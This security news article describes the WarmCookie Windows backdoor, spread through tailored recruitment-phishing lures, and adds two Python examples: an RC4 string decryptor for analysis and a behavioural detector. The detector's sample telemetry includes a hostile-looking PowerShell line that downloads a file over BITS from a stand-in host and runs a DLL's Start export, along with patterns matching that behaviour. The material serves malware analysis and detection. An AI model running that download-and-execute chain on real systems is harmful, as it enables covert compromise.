WarmCookie Gives Cyberattackers Tasty New Backdoor for Initial Access

Published: 23/11/2024   Category: security




The fresh-baked malware is being widely distributed, but still specifically targets individuals with tailored lures. It's poised to evolve into a bigger threat, researchers warn.



A purpose-built Windows backdoor appears to be the new flavor of the month for giving attackers entry into targeted systems; after initial access, they pivot to ransomware delivery and system compromise in a wave of recent attacks.
Dubbed WarmCookie by researchers at Elastic Security Labs, the backdoor has been distributed widely in a spate of phishing emails starting in late April by a campaign called REF6127. It uses recruitment and potential jobs as lures, the researchers revealed in a blog post today.
"While the malware itself isn't particularly sophisticated — it's mainly an initial backdoor tool for scouting out victim networks and deploying additional payloads — it shouldn't be taken lightly as it's actively being used and impacting organizations at a global scale," Daniel Stepanic, Elastic Security principal security research engineer, wrote in the post.
The backdoor's code overlaps with a sample that was previously reported by eSentire, suggesting that WarmCookie may be an update to malware that has been in circulation since 2022. However, the latest version of the backdoor represents a different, more pervasive threat, Stepanic noted.
"While some features are similar, such as the implementation of string obfuscation, WarmCookie contains differing functionality," he wrote. "Our team is seeing this threat distributed daily with the use of recruiting and job themes targeting individuals."
Phishing lures that use job recruitment are a common theme for attackers, who have previously found success targeting various professionals with fake promises of new employment positions. North Korean APT Lazarus is among the attackers that have been particularly active with this tactic.
The emails in the REF6127 campaign put a twist on this with lures that are specific to the individuals the attackers are targeting, the researchers said. Indeed, the campaign uses information about a target's current employer to dangle a type of position that might pique their interest, "enticing victims to pursue new job opportunities by clicking a link to an internal system to view a job description," Stepanic wrote.
In terms of the infection routine, one screenshot included in the post shows a message telling the recipient there is an exciting opportunity in the form of a new position open with one of the recruiter's clients. The message includes a "View Position Details" link that eventually leads to the deployment of WarmCookie.
If a target clicks the link, it goes to a landing page that looks legitimate and is tailored to the intended victim using his or her name; the page prompts the user to download a document by solving a CAPTCHA challenge. The landing pages used in the campaign resemble those in previous campaigns discovered by Google Cloud's security team that were used to spread a new variant of the URSNIF malware, Stepanic noted.
Solving the CAPTCHA challenge downloads an obfuscated JavaScript file that runs PowerShell, kicking off the first task to load WarmCookie. The PowerShell script abuses the Background Intelligent Transfer Service (BITS) to download the malware and run the DLL with the Start export.
To keep defenders on their toes, attackers continuously and rapidly generate new landing pages on IP address 45.9.74[.]135, targeting different recruiting firms in combination with keywords related to the job search industry. Moreover, before a victim reaches each landing page, the adversary distances itself by using compromised infrastructure to host the initial phishing URL, which redirects to the different landing pages, Stepanic noted.
WarmCookie is a two-stage lightweight backdoor that ultimately provides relatively straightforward functionality — such as retrieving victim info and screenshot recording — for monitoring victims and further deploying more damaging payloads, such as ransomware, according to the post.
In the first stage, which occurs after the PowerShell download of the malware, the backdoor sets itself up to run with SYSTEM privileges from the Task Scheduler Engine. "A critical part of the infection chain comes from the scheduled task, which is set up at the very beginning of the infection," Stepanic noted. The task, named RtlUpd, is scheduled to run every 10 minutes every day.
The malware's second stage contains the backdoor's core functionality and is the one in which the DLL is combined with the command line (Start /p) to set execution in motion.
Along the way, WarmCookie uses several tactics to avoid detection. One is to protect its strings using a custom string decryption algorithm in which "the first four bytes of each encrypted string in the .rdata section represent the size, the next four bytes represent the RC4 key, and the remaining bytes represent the string," Stepanic wrote. The developers also made the interesting choice of not always rotating the RC4 key between encrypted strings.
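As an added example (not code from Elastic's post or from the malware), the following Python builds a blob of records in the layout quoted above, walks it, and decrypts every string with its per-record RC4 key. It also reports which keys are shared between records, because the key reuse the researchers describe means that recovering one key decrypts every string that shares it. Two details are assumptions the article does not state: the size field is taken as little-endian and as counting only the ciphertext bytes. The plaintexts and keys in the sample blob are constructed for the example.

```python
import struct
from collections import defaultdict


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def pack_record(key: bytes, plaintext: bytes) -> bytes:
    """Build one record in the described layout: [size:4][RC4 key:4][ciphertext:size].
    Assumption (not in the article): size is little-endian and counts only the ciphertext."""
    assert len(key) == 4, "the article describes a four-byte RC4 key"
    ct = rc4(key, plaintext)
    return struct.pack("<I", len(ct)) + key + ct


def parse_records(blob: bytes):
    """Walk back-to-back records and decrypt each one.
    Returns a list of (offset, key, plaintext). Stops at the first header whose
    declared size overruns the blob, which is what a truncated .rdata slice or
    non-record data at the tail looks like."""
    records = []
    off = 0
    while off + 8 <= len(blob):
        size = struct.unpack_from("<I", blob, off)[0]
        key = blob[off + 4:off + 8]
        start, end = off + 8, off + 8 + size
        if size == 0 or end > len(blob):
            break
        records.append((off, key, rc4(key, blob[start:end])))
        off = end
    return records


def reused_keys(records):
    """Map each RC4 key that protects more than one string to the record offsets
    using it. One recovered key then decrypts every string in that group."""
    by_key = defaultdict(list)
    for off, key, _ in records:
        by_key[key].append(off)
    return {k: offs for k, offs in by_key.items() if len(offs) > 1}


# Constructed sample blob: three records, two sharing KEY_A, followed by eight
# bytes of junk whose declared size overruns the blob (exercises the guard).
KEY_A = b"\x11\x22\x33\x44"
KEY_B = b"\xde\xad\xbe\xef"
SAMPLE_BLOB = (
    pack_record(KEY_A, b"RtlUpd")
    + pack_record(KEY_B, b"Start /p")
    + pack_record(KEY_A, b"screenshot")
    + b"\xff\xff\xff\xff" + b"AAAA"
)

if __name__ == "__main__":
    recs = parse_records(SAMPLE_BLOB)
    for off, key, pt in recs:
        print(f"0x{off:04x} key={key.hex()} -> {pt!r}")
    print("reused keys:", {k.hex(): v for k, v in reused_keys(recs).items()})
```

Against a real sample, `parse_records` would be pointed at the relevant slice of the `.rdata` section rather than the constructed blob, and the offset of each decrypted string is what you would feed back into a disassembler as a comment.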
WarmCookie also uses dynamic API loading to prevent static analysis from identifying its core functionality, and includes a few anti-analysis checks commonly used to detect sandboxes, based on logic that checks the number of active CPU processors and the physical/virtual memory values, he added.
Elastic is urging organizations to be on the lookout for WarmCookie, which will likely evolve over time as its developers enhance it with advanced functionality.
"Our team believes this malware represents a formidable threat that provides the capability to access target environments and push additional types of malware down to victims," Stepanic wrote.
The post includes a screenshot of YARA rules that organizations can use to identify the presence of WarmCookie in an environment. Elastic also specifically addresses various behaviors of the backdoor, including its PowerShell download and execution and its scheduled task creation, to provide insight into how to detect this activity on an organization's network.
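As an added example (not Elastic's detection logic, nor code from the post), the Python below runs three behavioural checks over constructed, Sysmon-style telemetry modelled on the chain described in this article: PowerShell spawned by a Windows script host (the obfuscated JavaScript stage), a PowerShell command line that pairs a BITS transfer with launching a DLL's Start export, and a scheduled task named RtlUpd, or more generally a SYSTEM task on a ten-minute interval whose action points into a user-writable path. The field names, the use of rundll32 as the loader, the BITS cmdlet/utility names and all sample events are assumptions for the example; the article itself names only the Start export and the RtlUpd task name.

```python
import re

# Constructed sample telemetry, loosely shaped like Sysmon process-creation
# (EID 1) and Security scheduled-task-creation (EID 4698) records. None of
# these lines are real WarmCookie telemetry; the hostnames/URLs are invented.
SAMPLE_EVENTS = [
    {   # JS stage runs PowerShell, which pulls a DLL via BITS and calls its Start export
        "type": "process",
        "parent": r"C:\Windows\System32\wscript.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": 'powershell.exe -w hidden -ep bypass -c "Start-BitsTransfer '
                   '-Source http://example.invalid/x.bin -Destination $env:TEMP\\u.dll; '
                   'rundll32 $env:TEMP\\u.dll,Start"',
    },
    {   # benign admin PowerShell, should not alert
        "type": "process",
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe Get-ChildItem C:\\Logs",
    },
    {   # persistence task as described: RtlUpd, SYSTEM, every 10 minutes
        "type": "task",
        "task_name": r"\RtlUpd",
        "run_as": "SYSTEM",
        "interval_min": 10,
        "action": r"rundll32.exe C:\Users\Public\u.dll,Start /p",
    },
    {   # legitimate built-in task, should not alert
        "type": "task",
        "task_name": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
        "run_as": "SYSTEM",
        "interval_min": 10080,
        "action": r"%windir%\system32\defrag.exe -c -h -o -$",
    },
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Assumed BITS download spellings: the PowerShell cmdlet or the bitsadmin utility.
BITS_PATTERN = re.compile(r"start-bitstransfer|bitsadmin(\.exe)?\s+/transfer", re.I)
# "<something>.dll,Start": a DLL export named Start being invoked.
DLL_START_PATTERN = re.compile(r"\.dll\s*,\s*start\b", re.I)
# Paths a standard user can write to; a SYSTEM task pointing here is suspicious.
USER_WRITABLE = re.compile(
    r"\\(users\\[^\\]+\\appdata|users\\public|programdata|windows\\temp)\\", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev: dict) -> list:
    hits = []
    if basename(ev["image"]).startswith("powershell") and basename(ev["parent"]) in SCRIPT_HOSTS:
        hits.append("ps_from_script_host")
    if BITS_PATTERN.search(ev["cmdline"]) and DLL_START_PATTERN.search(ev["cmdline"]):
        hits.append("bits_download_then_dll_start")
    return hits


def check_task(ev: dict) -> list:
    hits = []
    if basename(ev["task_name"]) == "rtlupd":
        hits.append("task_name_rtlupd")
    if (ev["run_as"].upper() == "SYSTEM" and ev["interval_min"] <= 10
            and USER_WRITABLE.search(ev["action"])):
        hits.append("system_task_short_interval_user_path")
    return hits


def detect(events: list) -> list:
    """Return (event index, rule id) pairs for every rule each event trips."""
    findings = []
    for idx, ev in enumerate(events):
        hits = check_process(ev) if ev["type"] == "process" else check_task(ev)
        findings.extend((idx, h) for h in hits)
    return findings


if __name__ == "__main__":
    for idx, rule in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The name-based rule (`task_name_rtlupd`) is the cheapest to write and the easiest for the operators to break by renaming the task; the behavioural rules (script host spawning PowerShell, BITS plus a DLL export call, a SYSTEM task on a short interval running from a user-writable directory) survive that change and are the ones worth keeping once the indicator goes stale.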
